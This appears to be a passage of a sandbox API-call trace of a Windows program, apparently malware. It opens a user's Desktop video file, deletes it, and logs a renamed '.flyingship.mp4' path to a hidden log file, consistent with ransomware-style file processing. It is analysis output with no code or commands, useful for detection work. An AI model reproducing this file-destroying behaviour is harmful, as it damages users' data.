[0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.599] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.599] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.600] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.600] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0168.600] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0168.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0168.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0168.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0168.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd780, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0168.602] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_ilndjr.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0168.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0168.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0168.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0168.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0168.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0168.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0168.602] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.602] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0168.603] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.603] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0168.603] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0168.603] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0168.603] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0168.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0168.603] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0168.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0168.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9ba4f8 [0168.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba4f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0168.605] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.605] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0168.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0168.606] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0168.606] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0168.606] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0168.606] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0168.606] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0168.606] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0168.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.606] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0168.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0168.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9fb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0168.608] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.608] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0168.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0168.609] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0168.609] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.609] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4", lpFilePart=0x0) returned 0x31 [0168.610] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x671ad310, ftCreationTime.dwHighDateTime=0x1d5e07e, ftLastAccessTime.dwLowDateTime=0x5571c040, ftLastAccessTime.dwHighDateTime=0x1d5de91, ftLastWriteTime.dwLowDateTime=0x9da3440, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x7952, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="_IlnDJr.mp4", cAlternateFileName="")) returned 0x90af58 [0168.611] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_ilndjr.mp4")) returned 1 [0168.613] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x671ad310, ftCreationTime.dwHighDateTime=0x1d5e07e, ftLastAccessTime.dwLowDateTime=0x5571c040, ftLastAccessTime.dwHighDateTime=0x1d5de91, ftLastWriteTime.dwLowDateTime=0x9da3440, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x7952, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="_IlnDJr.mp4", cAlternateFileName="")) returned 0 [0168.613] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0168.614] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.614] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.614] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0168.614] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.614] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.614] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.614] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.615] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.615] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0168.615] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.615] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0168.615] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.615] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0168.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.616] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0168.616] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87f43c*=0xcb5, lpOverlapped=0x0) returned 1 [0168.616] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0168.616] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xcb5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.616] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0168.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0168.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.flyingship.mp4\r\n", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0168.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.flyingship.mp4\r\n", cchWideChar=63, lpMultiByteStr=0x8db180, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.flyingship.mp4\r\n", lpUsedDefaultChar=0x0) returned 63 [0168.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.617] WriteFile (in: hFile=0x120, lpBuffer=0x8db138*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8db138*, lpNumberOfBytesWritten=0x87f43c*=0x3e, lpOverlapped=0x0) returned 1 [0168.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.617] CloseHandle (hObject=0x120) returned 1 [0168.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0168.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0168.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0168.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0168.632] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0168.632] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.633] HeapFree (in: hHeap=0x8a0000, 